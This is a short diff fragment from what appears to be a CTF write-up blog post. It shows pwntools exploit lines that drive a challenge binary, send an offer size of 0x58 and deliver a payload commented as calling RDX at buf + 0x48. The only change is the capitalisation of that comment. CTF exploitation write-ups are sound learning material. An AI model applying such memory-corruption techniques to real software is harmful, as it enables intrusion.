dplastico/dplastico.github.io/_posts/2022-05-25-Apocalypse_ctf.md

 r.recvuntil(b"Are you sure that you want to make an offer(y/n)") r.sendline(b"y") r.sendlineafter(b"your offer to be?", str(0x58))
-r.sendafter(b"What can you offer me?", payload) #call rdx at buf + 0x48
+r.sendafter(b"What can you offer me?", payload) #call RDX at buf + 0x48

 #execute, calling 1
 r.recvuntil(b"What do you want to do?")